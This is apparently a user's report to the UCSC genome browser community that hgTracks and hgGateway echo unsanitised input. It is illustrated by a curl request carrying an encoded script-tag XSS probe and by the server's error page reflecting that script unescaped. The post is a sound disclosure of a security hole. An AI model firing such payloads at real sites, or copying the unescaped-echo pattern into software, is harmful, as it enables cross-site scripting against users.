Our lab is running a local installation of the genome browser and our security dept. has a identified a vulnerability in the browser's code. It seems the issue is that the input to, say, hgTracks or hgGateway is not sanitized in any way, and this leads
to the possibility of cross site scripting, as in:
$ curl 'https://genome.ucsc.edu/cgi-bin/hgTracks?hgsid=%27%22()%26%25%3Cacv%3E%3CScRiPt%20%3Eprompt(911920)%3C/ScRiPt%3E'
<HTML><HEAD>
<TITLE>Very Early Error</TITLE>
<META http-equiv="Content-Script-Type" content="text/javascript">
<link rel='stylesheet' href='../style/HGStyle-v338.css' type='text/css'>
</HEAD>
<BODY CLASS="hgTracks cgi">
<script type='text/javascript'>
document.write("<center><div id='warnBox' style='display:none;'><CENTER><B id='warnHead'></B></CENTER><UL id='warnList'></UL><CENTER><button id='warnOK' onclick='hideWarnBox();return false;'></button></CENTER></div></center>");
function showWarnBox() {document.getElementById('warnOK').innerHTML=' OK ';var warnBox=document.getElementById('warnBox');warnBox.style.display=''; warnBox.style.width='65%';document.getElementById('warnHead').innerHTML='Warning/Error(s):';window.scrollTo(0,
0);}
function hideWarnBox() {var warnBox=document.getElementById('warnBox');warnBox.style.display='none';warnBox.innerHTML='';var endOfPage = document.body.innerHTML.substr(document.body.innerHTML.length-20);if(endOfPage.lastIndexOf('--
ERROR --') > 0) { history.back(); }}
window.onunload = function(){}; // Trick to avoid FF back button issue.
</script>
<!-- HGERROR-START -->
<P>invalid unsigned integer: "'"()&%<acv><ScRiPt >prompt(911920)</ScRiPt>"</P>
<!-- HGERROR-END -->
</BODY></HTML>